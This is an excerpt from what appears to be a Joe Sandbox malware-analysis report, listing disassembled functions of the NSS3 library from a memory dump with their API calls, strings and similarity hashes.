PR_NewCondVar.NSS3 ref: 6CA921B7
calloc.MOZGLUE(00000001,00000084), ref: 6CA9221C
InitializeCriticalSectionAndSpinCount.KERNEL32(0000001C,000005DC), ref: 6CA922C2
GetLastError.KERNEL32 ref: 6CA922CD
free.MOZGLUE(00000000), ref: 6CA922DD

Part of subcall function 6CA90F00: PR_GetPageSize.NSS3(6CA90936,FFFFE8AE,?,6CA216B7,00000000,?,6CA90936,00000000,?,6CA2204A), ref: 6CA90F1B
Part of subcall function 6CA90F00: PR_NewLogModule.NSS3(clock,6CA90936,FFFFE8AE,?,6CA216B7,00000000,?,6CA90936,00000000,?,6CA2204A), ref: 6CA90F25

Memory Dump Source

Source File: 00000000.00000002.2748681193.000000006CA21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000000.00000002.2748640035.000000006CA20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2748972990.000000006CBBF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749042840.000000006CBFE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749081606.000000006CBFF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749117716.000000006CC00000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749154237.000000006CC05000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ca20000_file.jbxd

Similarity

API ID: calloc$CondCountCriticalErrorInitializeLastModulePageSectionSizeSpinValuefree
String ID:
API String ID: 3559583721-0
Opcode ID: aace02209e9721f312c61788ee894523fcbb732b849e9cbe21ead08f90f47a4e
Instruction ID: b8f10e18d6541be595dec72f6536ec7c1f677af55d795fd7d6291d67726ad2df
Opcode Fuzzy Hash: aace02209e9721f312c61788ee894523fcbb732b849e9cbe21ead08f90f47a4e
Instruction Fuzzy Hash: 45918CB0B117018FDB20EF38DC1A75B7AF4BB06708F05462EE55AD7A40DB71A589CB92

Function 6CBB9C60 Relevance: 27.2, APIs: 18, Instructions: 202threadCOMMON

Download Yara Rule

APIs

calloc.MOZGLUE(00000001,00000080), ref: 6CBB9C70
PR_NewLock.NSS3 ref: 6CBB9C85

Part of subcall function 6CB698D0: calloc.MOZGLUE(00000001,00000084,6CA90936,00000001,?,6CA9102C), ref: 6CB698E5

PR_NewCondVar.NSS3(00000000), ref: 6CBB9C96

Part of subcall function 6CA8BB80: calloc.MOZGLUE(00000001,00000084,00000000,00000040,?,6CA921BC), ref: 6CA8BB8C

PR_NewLock.NSS3 ref: 6CBB9CA9

Part of subcall function 6CB698D0: InitializeCriticalSectionAndSpinCount.KERNEL32(0000001C,000005DC), ref: 6CB69946
Part of subcall function 6CB698D0: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,6CA216B7,00000000), ref: 6CB6994E
Part of subcall function 6CB698D0: free.MOZGLUE(00000000), ref: 6CB6995E

PR_NewLock.NSS3 ref: 6CBB9CB9
PR_NewLock.NSS3 ref: 6CBB9CC9
PR_NewCondVar.NSS3(00000000), ref: 6CBB9CDA

Part of subcall function 6CA8BB80: PR_SetError.NSS3(FFFFE890,00000000), ref: 6CA8BBEB
Part of subcall function 6CA8BB80: InitializeCriticalSectionAndSpinCount.KERNEL32(0000000C,000005DC), ref: 6CA8BBFB
Part of subcall function 6CA8BB80: GetLastError.KERNEL32 ref: 6CA8BC03
Part of subcall function 6CA8BB80: PR_SetError.NSS3(FFFFE8AA,00000000), ref: 6CA8BC19
Part of subcall function 6CA8BB80: free.MOZGLUE(00000000), ref: 6CA8BC22

PR_NewCondVar.NSS3(?), ref: 6CBB9CF0
PR_NewPollableEvent.NSS3 ref: 6CBB9D03

Part of subcall function 6CBAF3B0: PR_CallOnce.NSS3(6CC014B0,6CBAF510), ref: 6CBAF3E6
Part of subcall function 6CBAF3B0: PR_CreateIOLayerStub.NSS3(6CC0006C), ref: 6CBAF402
Part of subcall function 6CBAF3B0: PR_Malloc.NSS3(00000004), ref: 6CBAF416
Part of subcall function 6CBAF3B0: PR_NewTCPSocketPair.NSS3(?), ref: 6CBAF42D
Part of subcall function 6CBAF3B0: PR_SetSocketOption.NSS3(?), ref: 6CBAF455
Part of subcall function 6CBAF3B0: PR_PushIOLayer.NSS3(?,000000FE,00000000), ref: 6CBAF473

Part of subcall function 6CB69890: TlsGetValue.KERNEL32(?,?,?,6CB697EB), ref: 6CB6989E

EnterCriticalSection.KERNEL32(?), ref: 6CBB9D78
calloc.MOZGLUE(00000001,0000000C), ref: 6CBB9DAF
_PR_CreateThread.NSS3(00000000,6CBB9EA0,00000000,00000001,00000001,00000000,?,00000000), ref: 6CBB9D9F

Part of subcall function 6CA8B3C0: TlsGetValue.KERNEL32 ref: 6CA8B403
Part of subcall function 6CA8B3C0: _PR_NativeCreateThread.NSS3(?,?,?,?,?,?,?,?), ref: 6CA8B459

_PR_CreateThread.NSS3(00000000,6CBBA060,00000000,00000001,00000001,00000000,?,00000000), ref: 6CBB9DE8
calloc.MOZGLUE(00000001,0000000C), ref: 6CBB9DFC
_PR_CreateThread.NSS3(00000000,6CBBA530,00000000,00000001,00000001,00000000,?,00000000), ref: 6CBB9E29
calloc.MOZGLUE(00000001,0000000C), ref: 6CBB9E3D
_PR_MD_UNLOCK.NSS3(?), ref: 6CBB9E71
PR_SetError.NSS3(FFFFE890,00000000), ref: 6CBB9E89

Memory Dump Source

Source File: 00000000.00000002.2748681193.000000006CA21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000000.00000002.2748640035.000000006CA20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2748972990.000000006CBBF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749042840.000000006CBFE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749081606.000000006CBFF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749117716.000000006CC00000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749154237.000000006CC05000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ca20000_file.jbxd

Similarity

API ID: calloc$CreateError$LockThread$CondCriticalSection$CountInitializeLastLayerSocketSpinValuefree$CallEnterEventMallocNativeOnceOptionPairPollablePushStub
String ID:
API String ID: 4254102231-0
Opcode ID: b8cd8ecd78ad8596aa7de9f86ab698198a1690a5b1365a611565e228d83793ae
Instruction ID: 04604c097f118dc7981ad2f4e080cda217d49046919643b43cd6b8d8f29dbb05
Opcode Fuzzy Hash: b8cd8ecd78ad8596aa7de9f86ab698198a1690a5b1365a611565e228d83793ae
Instruction Fuzzy Hash: 4E616EB1E01746AFD710DF75D844AABBBF8FF08248B044529E859D7B50EB30E858CBA1

Function 6CAB3FF0 Relevance: 27.2, APIs: 18, Instructions: 201memoryCOMMON

Download Yara Rule

APIs

SECKEY_CopyPublicKey.NSS3(?), ref: 6CAB4014

Part of subcall function 6CAB39F0: PORT_NewArena_Util.NSS3(00000800,?,?,?,?,?,?,?,?,00000000,00000000,?,?,6CAB5E6F,?), ref: 6CAB3A08
Part of subcall function 6CAB39F0: PORT_ArenaAlloc_Util.NSS3(00000000,000000AC,?,?,?,?,?,?,?,?,?,00000000,00000000,?,?,6CAB5E6F), ref: 6CAB3A1C
Part of subcall function 6CAB39F0: memset.VCRUNTIME140(-00000004,00000000,000000A8,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6CAB3A3C

PORT_NewArena_Util.NSS3(00000800), ref: 6CAB4038

Part of subcall function 6CB00FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6CAA87ED,00000800,6CA9EF74,00000000), ref: 6CB01000
Part of subcall function 6CB00FF0: PR_NewLock.NSS3(?,00000800,6CA9EF74,00000000), ref: 6CB01016
Part of subcall function 6CB00FF0: PL_InitArenaPool.NSS3(00000000,security,6CAA87ED,00000008,?,00000800,6CA9EF74,00000000), ref: 6CB0102B

PORT_ArenaAlloc_Util.NSS3(00000000,00000028), ref: 6CAB404D

Part of subcall function 6CB010C0: TlsGetValue.KERNEL32(?,6CAA8802,00000000,00000008,?,6CA9EF74,00000000), ref: 6CB010F3
Part of subcall function 6CB010C0: EnterCriticalSection.KERNEL32(?,?,6CAA8802,00000000,00000008,?,6CA9EF74,00000000), ref: 6CB0110C
Part of subcall function 6CB010C0: PL_ArenaAllocate.NSS3(?,?,?,6CAA8802,00000000,00000008,?,6CA9EF74,00000000), ref: 6CB01141
Part of subcall function 6CB010C0: PR_Unlock.NSS3(?,?,?,6CAA8802,00000000,00000008,?,6CA9EF74,00000000), ref: 6CB01182
Part of subcall function 6CB010C0: TlsGetValue.KERNEL32(?,6CAA8802,00000000,00000008,?,6CA9EF74,00000000), ref: 6CB0119C

SEC_ASN1EncodeItem_Util.NSS3(00000000,-0000001C,00000000,6CBCA0F4), ref: 6CAB40C2

Part of subcall function 6CAFF080: PORT_FreeArena_Util.NSS3(00000000,00000000,?,?,?,?,?,?,?,?,?), ref: 6CAFF0C8
Part of subcall function 6CAFF080: PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6CAFF122

SECOID_SetAlgorithmID_Util.NSS3(00000000,00000004,00000010,00000000), ref: 6CAB409A

Part of subcall function 6CAFBE60: SECOID_FindOIDByTag_Util.NSS3(00000000,00000000,00000000,00000000,?,6CAAE708,00000000,00000000,00000004,00000000), ref: 6CAFBE6A
Part of subcall function 6CAFBE60: SECITEM_CopyItem_Util.NSS3(00000000,?,00000000,00000000,?,?,?,?,?,?,?,00000000,?,?,6CAB04DC,?), ref: 6CAFBE7E
Part of subcall function 6CAFBE60: SECITEM_CopyItem_Util.NSS3(?,?,?,?,?,?,00000000,?,?,?,?,?,?,?,00000000,?), ref: 6CAFBEC2

PR_SetError.NSS3(FFFFE005,00000000), ref: 6CAB40DE
PR_SetError.NSS3(FFFFE013,00000000), ref: 6CAB40F4
PR_SetError.NSS3(FFFFE013,00000000), ref: 6CAB4108
SECITEM_CopyItem_Util.NSS3(00000000,?,00000010), ref: 6CAB411A
SECOID_SetAlgorithmID_Util.NSS3(00000000,00000004,000000C8), ref: 6CAB4137
SECITEM_CopyItem_Util.NSS3(00000000,-0000001C,-00000020), ref: 6CAB4150
SEC_ASN1EncodeItem_Util.NSS3(00000000,?,-00000010,6CBCA1C8), ref: 6CAB417E
SECOID_SetAlgorithmID_Util.NSS3(00000000,00000004,0000007C), ref: 6CAB4194
SECITEM_ZfreeItem_Util.NSS3(00000000,00000000), ref: 6CAB41A7
PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6CAB41B2
PK11_DestroyObject.NSS3(?,?), ref: 6CAB41D9
PORT_FreeArena_Util.NSS3(?,00000000), ref: 6CAB41FC
SEC_ASN1EncodeItem_Util.NSS3(00000000,-0000001C,00000000,6CBCA1A8), ref: 6CAB422D

Memory Dump Source

Source File: 00000000.00000002.2748681193.000000006CA21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000000.00000002.2748640035.000000006CA20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2748972990.000000006CBBF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749042840.000000006CBFE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749081606.000000006CBFF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749117716.000000006CC00000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749154237.000000006CC05000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ca20000_file.jbxd

Similarity

API ID: Util$Item_$Arena_$Copy$ArenaFree$AlgorithmEncodeError$Alloc_Value$AllocateCriticalDestroyEnterFindInitK11_LockObjectPoolPublicSectionTag_UnlockZfreecallocmemset
String ID:
API String ID: 912348568-0
Opcode ID: fffd99ce7274e7bb4322aa9d561f2cb2e6811041132b6a29d1e022ee6a040c45
Instruction ID: 2e3fb42038433e605df1eae9106c47f3306dbb401866cf8504a4a0610ffe8327
Opcode Fuzzy Hash: fffd99ce7274e7bb4322aa9d561f2cb2e6811041132b6a29d1e022ee6a040c45
Instruction Fuzzy Hash: 4B51E8B5F003006BF7109A25ED41B6B76ECDF5024CF084519F969E6F82FB31E5889762

Function 6CAF8E40 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 198stringmemoryCOMMON

Download Yara Rule

APIs

memchr.VCRUNTIME140(abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789-_,00000000,00000041,6CAF8E01,00000000,6CAF9060,6CC00B64), ref: 6CAF8E7B
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,6CAF8E01,00000000,6CAF9060,6CC00B64), ref: 6CAF8E9E
PORT_ArenaAlloc_Util.NSS3(6CC00B64,00000001,?,?,?,?,6CAF8E01,00000000,6CAF9060,6CC00B64), ref: 6CAF8EAD
memcpy.VCRUNTIME140(00000000,00000000,00000001,?,?,?,?,?,?,6CAF8E01,00000000,6CAF9060,6CC00B64), ref: 6CAF8EC3
strlen.API-MS-WIN-CRT-STRING-L1-1-0(5D8B5657,?,?,?,?,?,?,?,?,?,6CAF8E01,00000000,6CAF9060,6CC00B64), ref: 6CAF8ED8
PORT_ArenaAlloc_Util.NSS3(?,00000001,?,?,?,?,?,?,?,?,?,?,6CAF8E01,00000000,6CAF9060,6CC00B64), ref: 6CAF8EE5
memcpy.VCRUNTIME140(00000000,5D8B5657,00000001,?,?,?,?,?,?,?,?,?,?,?,?,6CAF8E01), ref: 6CAF8EFB
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(6CC00B64,6CC00B64), ref: 6CAF8F11
PORT_ArenaGrow_Util.NSS3(?,5D8B5657,643D8B08), ref: 6CAF8F3F

Part of subcall function 6CAFA110: PORT_ArenaGrow_Util.NSS3(8514C483,EB2074C0,184D8B3E,?,00000000,00000000,00000000,FFFFFFFF,?,6CAFA421,00000000,00000000,6CAF9826), ref: 6CAFA136

PR_SetError.NSS3(FFFFE013,00000000), ref: 6CAF904A

Strings

abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789-_, xrefs: 6CAF8E76

Memory Dump Source

Source File: 00000000.00000002.2748681193.000000006CA21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000000.00000002.2748640035.000000006CA20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2748972990.000000006CBBF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749042840.000000006CBFE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749081606.000000006CBFF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749117716.000000006CC00000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749154237.000000006CC05000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ca20000_file.jbxd

Similarity

API ID: ArenaUtil$Alloc_Grow_memcpystrlen$Errormemchrstrcmp
String ID: abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789-_
API String ID: 977052965-1032500510
Opcode ID: d6b351a29b92e8ce5d195ef2185be0b4871275b873f0809a69ee3b917586fd33
Instruction ID: e97f99724f2b1d190812c43be282851d57ca874e7337cf81491c67741fceef40
Opcode Fuzzy Hash: d6b351a29b92e8ce5d195ef2185be0b4871275b873f0809a69ee3b917586fd33
Instruction Fuzzy Hash: 0E61A5B5D001459FDB10CF66CD40AAFB7B9FF85358F184128EC28A7710E732A956CBA0

Function 6CAA8E00 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 193memoryCOMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE005,00000000), ref: 6CAA8E5B
PR_SetError.NSS3(FFFFE007,00000000), ref: 6CAA8E81
PL_InitArenaPool.NSS3(?,security,00000800,00000008), ref: 6CAA8EED
SEC_QuickDERDecodeItem_Util.NSS3(?,?,6CBD18D0,?), ref: 6CAA8F03
PR_CallOnce.NSS3(6CC02AA4,6CB012D0), ref: 6CAA8F19
PL_FreeArenaPool.NSS3(?), ref: 6CAA8F2B
PORT_ArenaAlloc_Util.NSS3(?,00000001), ref: 6CAA8F53
memset.VCRUNTIME140(00000000,00000000,00000001), ref: 6CAA8F65
PL_FinishArenaPool.NSS3(?), ref: 6CAA8FA1
SECITEM_DupItem_Util.NSS3(?), ref: 6CAA8FFE
PR_CallOnce.NSS3(6CC02AA4,6CB012D0), ref: 6CAA9012
PL_FreeArenaPool.NSS3(?), ref: 6CAA9024
PL_FinishArenaPool.NSS3(?), ref: 6CAA902C
PORT_DestroyCheapArena.NSS3(?), ref: 6CAA903E

Strings

security, xrefs: 6CAA8EE7

Memory Dump Source

Source File: 00000000.00000002.2748681193.000000006CA21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000000.00000002.2748640035.000000006CA20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2748972990.000000006CBBF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749042840.000000006CBFE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749081606.000000006CBFF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749117716.000000006CC00000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749154237.000000006CC05000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ca20000_file.jbxd

Similarity

API ID: Arena$Pool$Util$CallErrorFinishFreeItem_Once$Alloc_CheapDecodeDestroyInitQuickmemset
String ID: security
API String ID: 3512696800-3315324353
Opcode ID: 2800eeaac04691480e67a8ea548456b011861b79a30e06579ef9ddb32e7a3cc8
Instruction ID: aa18933a50a1e5cc3c077326d42c9731cddef9d219a3a82493c5603109c26799
Opcode Fuzzy Hash: 2800eeaac04691480e67a8ea548456b011861b79a30e06579ef9ddb32e7a3cc8
Instruction Fuzzy Hash: D35128B16082C0ABD7109A999C41BAF77E8AF8575CF48082EF85497B40E732D98AC753

Function 6CAD4E60 Relevance: 26.4, APIs: 9, Strings: 6, Instructions: 127COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_GetAttributeValue), ref: 6CAD4E83
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6CAD4EB8
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6CAD4EC7

Part of subcall function 6CBBD930: PL_strncpyz.NSS3(?,?,?), ref: 6CBBD963

PR_LogPrint.NSS3(?,00000000), ref: 6CAD4EDD
PL_strncpyz.NSS3(?, hObject = 0x%x,00000050), ref: 6CAD4F0B
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6CAD4F1A
PR_LogPrint.NSS3(?,00000000), ref: 6CAD4F30
PR_LogPrint.NSS3( pTemplate = 0x%p,?), ref: 6CAD4F4F
PR_LogPrint.NSS3( ulCount = %d,?), ref: 6CAD4F68

Strings

hObject = 0x%x, xrefs: 6CAD4EF5, 6CAD4F05
pTemplate = 0x%p, xrefs: 6CAD4F4A
C_GetAttributeValue, xrefs: 6CAD4E7E
hSession = 0x%x, xrefs: 6CAD4EA2, 6CAD4EB2
(CK_INVALID_HANDLE), xrefs: 6CAD4EC0, 6CAD4F13
ulCount = %d, xrefs: 6CAD4F63

Memory Dump Source

Source File: 00000000.00000002.2748681193.000000006CA21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000000.00000002.2748640035.000000006CA20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2748972990.000000006CBBF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749042840.000000006CBFE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749081606.000000006CBFF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749117716.000000006CC00000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749154237.000000006CC05000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ca20000_file.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: hObject = 0x%x$ hSession = 0x%x$ pTemplate = 0x%p$ ulCount = %d$ (CK_INVALID_HANDLE)$C_GetAttributeValue
API String ID: 1003633598-3530272145
Opcode ID: c272286c6bf575a4626ad51c3565c86e5c1c10c64cba95ff762df0d3a848be6e
Instruction ID: b7bc6b68490b92a0b99763161b61ea66188cae094d00770861c0a34f59f3b033
Opcode Fuzzy Hash: c272286c6bf575a4626ad51c3565c86e5c1c10c64cba95ff762df0d3a848be6e
Instruction Fuzzy Hash: 7E41F675701185ABDB00CF54ED48FAE77B5EB4671DF0B4028E508A7A12DB35AD8CCBA2

Function 6CAD4CD0 Relevance: 26.4, APIs: 9, Strings: 6, Instructions: 120COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_GetObjectSize), ref: 6CAD4CF3
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6CAD4D28
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6CAD4D37

Part of subcall function 6CBBD930: PL_strncpyz.NSS3(?,?,?), ref: 6CBBD963

PR_LogPrint.NSS3(?,00000000), ref: 6CAD4D4D
PL_strncpyz.NSS3(?, hObject = 0x%x,00000050), ref: 6CAD4D7B
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6CAD4D8A
PR_LogPrint.NSS3(?,00000000), ref: 6CAD4DA0
PR_LogPrint.NSS3( pulSize = 0x%p,?), ref: 6CAD4DBC
PR_LogPrint.NSS3( *pulSize = 0x%x,?), ref: 6CAD4E20

Strings

pulSize = 0x%p, xrefs: 6CAD4DB7
hObject = 0x%x, xrefs: 6CAD4D65, 6CAD4D75
C_GetObjectSize, xrefs: 6CAD4CEE
hSession = 0x%x, xrefs: 6CAD4D12, 6CAD4D22
(CK_INVALID_HANDLE), xrefs: 6CAD4D30, 6CAD4D83
*pulSize = 0x%x, xrefs: 6CAD4E1B

Memory Dump Source

Source File: 00000000.00000002.2748681193.000000006CA21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000000.00000002.2748640035.000000006CA20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2748972990.000000006CBBF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749042840.000000006CBFE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749081606.000000006CBFF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749117716.000000006CC00000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749154237.000000006CC05000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ca20000_file.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: *pulSize = 0x%x$ hObject = 0x%x$ hSession = 0x%x$ pulSize = 0x%p$ (CK_INVALID_HANDLE)$C_GetObjectSize
API String ID: 1003633598-3553622718
Opcode ID: 90c8536c66fb8af53758a8bc595f195a182316c43c54463beedd5cb8b8c9baf6
Instruction ID: 9f4d9c397ecbffbd4c734236697637daeffd7e5eab60f9709d99c58350c436cc
Opcode Fuzzy Hash: 90c8536c66fb8af53758a8bc595f195a182316c43c54463beedd5cb8b8c9baf6
Instruction Fuzzy Hash: 9D41D675701284AFEB009F14DD98FAE37B5EB4231DF074028E548AB612DB35AD8CCB52

Function 6CAD7C90 Relevance: 26.4, APIs: 8, Strings: 7, Instructions: 110COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_Verify), ref: 6CAD7CB6
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6CAD7CE4
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6CAD7CF3

Part of subcall function 6CBBD930: PL_strncpyz.NSS3(?,?,?), ref: 6CBBD963

PR_LogPrint.NSS3(?,00000000), ref: 6CAD7D09
PR_LogPrint.NSS3( pData = 0x%p,?), ref: 6CAD7D2A
PR_LogPrint.NSS3( ulDataLen = %d,?), ref: 6CAD7D45
PR_LogPrint.NSS3( pSignature = 0x%p,?), ref: 6CAD7D5E
PR_LogPrint.NSS3( ulSignatureLen = %d,?), ref: 6CAD7D77

Strings

C_Verify, xrefs: 6CAD7CB1
pData = 0x%p, xrefs: 6CAD7D25
ulDataLen = %d, xrefs: 6CAD7D40
pSignature = 0x%p, xrefs: 6CAD7D59
ulSignatureLen = %d, xrefs: 6CAD7D72
hSession = 0x%x, xrefs: 6CAD7CCE, 6CAD7CDE
(CK_INVALID_HANDLE), xrefs: 6CAD7CEC

Memory Dump Source

Source File: 00000000.00000002.2748681193.000000006CA21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000000.00000002.2748640035.000000006CA20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2748972990.000000006CBBF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749042840.000000006CBFE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749081606.000000006CBFF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749117716.000000006CC00000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749154237.000000006CC05000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ca20000_file.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: hSession = 0x%x$ pData = 0x%p$ pSignature = 0x%p$ ulDataLen = %d$ ulSignatureLen = %d$ (CK_INVALID_HANDLE)$C_Verify
API String ID: 1003633598-3278097884
Opcode ID: d4ce905c0b54acaed8e020b9f9080269af34600e264167047598cf9f9a54aa6f
Instruction ID: af9235865ca77674b151991f73a1a6aa31d79452e7999fa56c2c6655e60a8c47
Opcode Fuzzy Hash: d4ce905c0b54acaed8e020b9f9080269af34600e264167047598cf9f9a54aa6f
Instruction Fuzzy Hash: 6131C575701185AFDB049F54DE48FBE37B1EB4231DF4A4028E448E7612DB31A888CBA2

Function 6CAD2F00 Relevance: 26.4, APIs: 8, Strings: 7, Instructions: 110COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_SetPIN), ref: 6CAD2F26
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6CAD2F54
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6CAD2F63

Part of subcall function 6CBBD930: PL_strncpyz.NSS3(?,?,?), ref: 6CBBD963

PR_LogPrint.NSS3(?,00000000), ref: 6CAD2F79
PR_LogPrint.NSS3( pOldPin = 0x%p,?), ref: 6CAD2F9A
PR_LogPrint.NSS3( ulOldLen = %d,?), ref: 6CAD2FB5
PR_LogPrint.NSS3( pNewPin = 0x%p,?), ref: 6CAD2FCE
PR_LogPrint.NSS3( ulNewLen = %d,?), ref: 6CAD2FE7

Strings

ulOldLen = %d, xrefs: 6CAD2FB0
ulNewLen = %d, xrefs: 6CAD2FE2
pOldPin = 0x%p, xrefs: 6CAD2F95
C_SetPIN, xrefs: 6CAD2F21
hSession = 0x%x, xrefs: 6CAD2F3E, 6CAD2F4E
(CK_INVALID_HANDLE), xrefs: 6CAD2F5C
pNewPin = 0x%p, xrefs: 6CAD2FC9

Memory Dump Source

Source File: 00000000.00000002.2748681193.000000006CA21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000000.00000002.2748640035.000000006CA20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2748972990.000000006CBBF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749042840.000000006CBFE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749081606.000000006CBFF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749117716.000000006CC00000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749154237.000000006CC05000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ca20000_file.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: hSession = 0x%x$ pNewPin = 0x%p$ pOldPin = 0x%p$ ulNewLen = %d$ ulOldLen = %d$ (CK_INVALID_HANDLE)$C_SetPIN
API String ID: 1003633598-3716813897
Opcode ID: 6247ecb7bbe46491a2b4c9f97c1a30fee0dea61b8ef7606240876a7a1cbd358b
Instruction ID: 26df7dd6cf8a3112c8f4593ec15a9188219a01b0b2d049695e0d909254ecf30e
Opcode Fuzzy Hash: 6247ecb7bbe46491a2b4c9f97c1a30fee0dea61b8ef7606240876a7a1cbd358b
